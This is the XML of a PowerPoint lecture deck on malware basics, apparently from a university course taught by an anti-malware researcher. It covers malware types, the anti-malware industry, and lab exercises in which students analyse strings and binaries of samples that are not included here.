      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="748816171"/>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forensic analysis lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>forensic information, what can be said about these 3 attacks/samples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Attack/Sample 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Attack/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Sample 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Attack/Sample </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>would you prioritize these samples for further research? Why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424812492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string analysis lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Right-click flypaper.exe and choose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>SendTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>FileInsight</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2294235" y="1448675"/>
            <a:ext cx="4872037" cy="3256675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2001671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string analysis lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Open Sample 1 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>FileInsight</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Use the tool to decode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Sample 1 and extract strings</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Take </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Using string analysis, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>what can be said about these </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>3 samples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Attack/Sample 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Attack/Sample 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Attack/Sample </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>How would you prioritize these samples for further research? Why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2463899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 of malware: binary analysis lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>FileInsight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to locate XOR key and apply they key to decode web address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Take 20 minutes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>For each sample, what type of file is it? How would you replicate it? What dependencies would you expect?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Sample 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Sample 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Sample 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253836729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a:off x="1249407" y="1885950"/>
            <a:ext cx="6700108" cy="394222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Christiaan_Beek@Intelsecurity.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137006848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AM industry today</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>$10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>billion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>endpoint security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>market </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>has many players</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>300k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>threats</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>cataloged daily (200TB)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Talented researchers in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>high </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>demand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Many industry forums</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Sharing of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>information</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>mutually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>beneficially</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>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862" y="906245"/>
            <a:ext cx="4769938" cy="4237255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="999999"/>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53882" dir="2700000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="E6E6E6"/>
                  </a:outerShdw>
                </a:effectLst>
              </a14:hiddenEffects>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3714750" y="906245"/>
            <a:ext cx="5270499" cy="2914925"/>
            <a:chOff x="3714750" y="906245"/>
            <a:chExt cx="5270499" cy="2914925"/>
          </a:xfrm>
        </p:grpSpPr>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750" y="906245"/>
              <a:ext cx="5270499" cy="29149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7" name="TextBox 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7467600" y="3209151"/>
              <a:ext cx="1300163" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                <a:t>Source: Cisco</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134745192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malware: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>definitions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Malware = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>MALicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>softWARE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Viruses (not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>virii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Parasitic, Polymorphic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Trojans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Backdoor, Downloader, Password Stealer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Bot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Can be parasitic too (and server-side polymorphic)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Potentially </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Unwanted Program (PUP, PUA, PUS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Adware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, Spyware, Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2476727762"/>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alPolyTheme">
  <a:themeElements>
    <a:clrScheme name="McAfee 2012-2013">
      <a:dk1>
        <a:srgbClr val="5E6A71"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="B71234"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="5E6A71"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="DD6B30"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="0074A8"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="7B4180"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="69A23B"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="4796C9"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="005485"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Office Theme">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71234"/>
        </a:solidFill>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:lnSpc>
            <a:spcPct val="95000"/>
          </a:lnSpc>
          <a:defRPr sz="800" dirty="0">
            <a:solidFill>
              <a:srgbClr val="5E6A71"/>
            </a:solidFil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MS PGothic" pitchFamily="34" charset="-128"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:lnDef>
    <a:txDef>
      <a:spPr>
        <a:noFill/>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr>
          <a:defRPr sz="1600" dirty="0" err="1" smtClean="0">
            <a:solidFill>
              <a:srgbClr val="5E6A71"/>
            </a:solidFill>
            <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:tx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B21D7AA4670B4495BF272958E67C9B" ma:contentTypeVersion="0" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="f661a6805dd44efb843ec4350685fd62">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="5cc96cb0-bf68-4cb4-b2fb-a22ca8174642" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="9c516a77e56885c60f5232f8bf0b1bea" ns2:_="">
    <xsd:import namespace="5cc96cb0-bf68-4cb4-b2fb-a22ca8174642"/>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c96cb0-bf68-4cb4-b2fb-a22ca817464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5cc96cb0-bf68-4cb4-b2fb-a22ca8174642">CH5W44LABS13-49-21</_dlc_DocId>
    <_dlc_DocIdUrl xmlns="5cc96cb0-bf68-4cb4-b2fb-a22ca8174642">
      <Url>http://2010.corp.mcafee.com/sites/labs/innovation/defense_against_the_dark_arts/_layouts/DocIdRedir.aspx?ID=CH5W44LABS13-49-21</Url>
      <Description>CH5W44LABS13-49-21</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8298F2D-4ED8-4E90-9206-6356D336A7DF}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{972AB0AA-941C-4164-9392-CBC3E7C649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c96cb0-bf68-4cb4-b2fb-a22ca81746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E9F26E-672F-4653-A757-6196240B0C06}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="5cc96cb0-bf68-4cb4-b2fb-a22ca8174642"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{74606863-3598-4122-B41B-4EBCFFC83D0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51578</TotalTime>
  <Words>3598</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>662</Paragraphs>
  <Slides>75</Slides>
  <Notes>45</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CalPolyTheme</vt:lpstr>
      <vt:lpstr>Malware</vt:lpstr>
      <vt:lpstr>About me</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Basics of malware: What does it look like?</vt:lpstr>
      <vt:lpstr>Basics of malware: Why it exists</vt:lpstr>
      <vt:lpstr>Basics of malware: anti-malware research</vt:lpstr>
      <vt:lpstr>Basics of malware: 25 years of AM industry </vt:lpstr>
      <vt:lpstr>Basics of malware: AM industry today</vt:lpstr>
      <vt:lpstr>Basics of malware: definitions</vt:lpstr>
      <vt:lpstr>The biggest infection vector:</vt:lpstr>
      <vt:lpstr>Other infection vectors:</vt:lpstr>
      <vt:lpstr>Other infection vectors:</vt:lpstr>
      <vt:lpstr>Basics of malware: definitions</vt:lpstr>
      <vt:lpstr>Basics of malware: top threat today</vt:lpstr>
      <vt:lpstr>Bootkit Virus Example:  TDSS</vt:lpstr>
      <vt:lpstr>Trojan Horse</vt:lpstr>
      <vt:lpstr>Spyware</vt:lpstr>
      <vt:lpstr>Spyware (continued)</vt:lpstr>
      <vt:lpstr>Spyware (continued)</vt:lpstr>
      <vt:lpstr>Types of Spyware</vt:lpstr>
      <vt:lpstr>Other Unwanted Programs</vt:lpstr>
      <vt:lpstr>Exploit Kits</vt:lpstr>
      <vt:lpstr>Recent exploit Kits</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>RATs</vt:lpstr>
      <vt:lpstr>Ransom-ware</vt:lpstr>
      <vt:lpstr>Ransom-ware – bitcoin payment</vt:lpstr>
      <vt:lpstr>POS malware</vt:lpstr>
      <vt:lpstr>POS malware</vt:lpstr>
      <vt:lpstr>Basics of malware: Naming convention</vt:lpstr>
      <vt:lpstr>Basics of malware: name deciphering</vt:lpstr>
      <vt:lpstr>Basics of malware: virus total</vt:lpstr>
      <vt:lpstr>Basics of malware: malwr</vt:lpstr>
      <vt:lpstr>Basics of malware: other services</vt:lpstr>
      <vt:lpstr>Basics of malware: handling malware</vt:lpstr>
      <vt:lpstr>Basics of malware: malware replication</vt:lpstr>
      <vt:lpstr>PE file</vt:lpstr>
      <vt:lpstr>PE file</vt:lpstr>
      <vt:lpstr>Basics of malware: malware replication</vt:lpstr>
      <vt:lpstr>Basics of malware: malware replication</vt:lpstr>
      <vt:lpstr>Lab – Part 1</vt:lpstr>
      <vt:lpstr>Virtualization Versus Malware</vt:lpstr>
      <vt:lpstr>Basics of malware: malware replication</vt:lpstr>
      <vt:lpstr>Lab – Part 2</vt:lpstr>
      <vt:lpstr>Basics of malware: malware replication</vt:lpstr>
      <vt:lpstr>Lab – Part 3</vt:lpstr>
      <vt:lpstr>Basics of malware: malware replication</vt:lpstr>
      <vt:lpstr>Individual Assignment</vt:lpstr>
      <vt:lpstr>Basics of malware: Individual Assignment</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>Malware</vt:lpstr>
      <vt:lpstr>Basics of malware: recap</vt:lpstr>
      <vt:lpstr>Basics of malware: Assignment (questions?)</vt:lpstr>
      <vt:lpstr>Basics of malware: agenda</vt:lpstr>
      <vt:lpstr>Advanced Persistent Threats</vt:lpstr>
      <vt:lpstr>Malware Economy - APT</vt:lpstr>
      <vt:lpstr>Malware Economy - APT</vt:lpstr>
      <vt:lpstr>Malware Economy - APT</vt:lpstr>
      <vt:lpstr>Introducing the ‘APT-Kill-Chain’</vt:lpstr>
      <vt:lpstr>Custom/Targeted Malware</vt:lpstr>
      <vt:lpstr>Malware Economy - APT</vt:lpstr>
      <vt:lpstr>Malware Economy - APT</vt:lpstr>
      <vt:lpstr>Basics of malware: forensic analysis</vt:lpstr>
      <vt:lpstr>Basics of malware: static analysis</vt:lpstr>
      <vt:lpstr>Basics of malware: static analysis</vt:lpstr>
      <vt:lpstr>Basics of malware: string analysis</vt:lpstr>
      <vt:lpstr>Basics of malware: Binary analysis</vt:lpstr>
      <vt:lpstr>Basics of malware: Source analysis</vt:lpstr>
      <vt:lpstr>Lab</vt:lpstr>
